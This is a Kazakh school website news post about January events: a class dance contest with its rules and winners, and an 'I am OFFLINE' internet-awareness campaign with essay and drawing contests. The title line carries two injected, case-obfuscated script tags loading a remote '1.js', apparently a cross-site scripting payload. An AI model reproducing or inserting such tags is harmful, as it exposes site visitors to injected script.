Ғ.Әбдірахманұлы атындағы Қима орта мектебінің қаңтар айында өткізілген іс-шаралар жайлы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.02.2019

       Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 24.01 күні 5-9 сынып аралығында «1STREET DANZE» би байқауы өткізілді. Оқушылар іс-шараға белсене дайындық жұмыстарын жүргізді. Байқау барысында оқушыларға төмендегідей талаптар қойылды:

-    Кем дегенде әр сыныптан 6 оқушы қатысу керек;

-    Регламент: 3-5 минут;

-    Әр сынып 1 би дайындайды, еркін тақырыпта;

-    Актерлік шеберліктері, киімдері ескерілу керек.

       Сонымен қоса, оқушыларға «Өлеңді тап» сергіту сайысы өткізілді. Оқушылар жоғары қызығушылықпен белсене қатысты. Видеоролик арқылы танымал өлеңдерді сурет бойынша немесе мәтін бойынша табу керек болды.

Байқау нәтижесінде 3-ші орынды – 7 «А» сыныбы, 2-ші орынды – 8 «А» сыныбы, 1-ші орынды – 5 «Ә» сыныбы және гран-приді – 6-шы «А» сыныбы иеленді. Өкінішке орай, 5 «А» сыныбы мен 9 «А» сыныбы байқауға қатысқан жоқ. Сынып жетекшілеріне, оқушыларға ескерту айтылды.

Байқаудан кейін мектепішілік дискотека ұйымдастырылды.

 

        Жоспардан тыс Ғ.Әбдірахманұлы атындағы Қима орта мектебінде  27 қаңтардағы Халықаралық интернетсіз күніне арналған "Мен OFFLINE" республикалық кең ауқымды балалар акциясы аясында интернетке тәуелділіктің алдын алу, кәмелетке толмағандардың интернетті пайдалану мәдениетін арттыру мақсатында оқушыларға дәріс оқылды. Акция барысында 5-11 сынып оқушыларына интернет жайлы қызықты деректер ұсынылды. Сонымен қатар, интернет желісінің адамның ойлау қабілеті мен сана сезіміне қалай әсер ететіні туралы видеоролик көрсетілді. Оқушылар өзара ой пікірлерімен алмаса отырып, қосымша сұрақтарға жауап берді.

       Акция барысында «Менің интернетсіз бір күнім» тақырыбында 5-11 сынып оқушылары арасында эссе байқауы өткізілді. Байқаудың мақсаты – оқушылардың әлеуметтік желіде, ғаламтор желісінде отыру статистикасын ескере отырып, бос уақытын өткізу неге арнайтынын сараптау болып табылады. Байқау нәтижесінде Шахманов Шамай – 3 орын, Дулат Карина – 2 орын, Жакен Аннұр – 1-ші орынға ие болды.

        Акция аясында бастауыш 1-4 сыныптарда сурет байқауы өткізілді. Оқушылар іс-шараға жоғары белсенділік таныта қатысты.

 

Домнаева М.Д.

Просмотров: 878


Пікір қосу



Деректерді қолтаңбаға қосу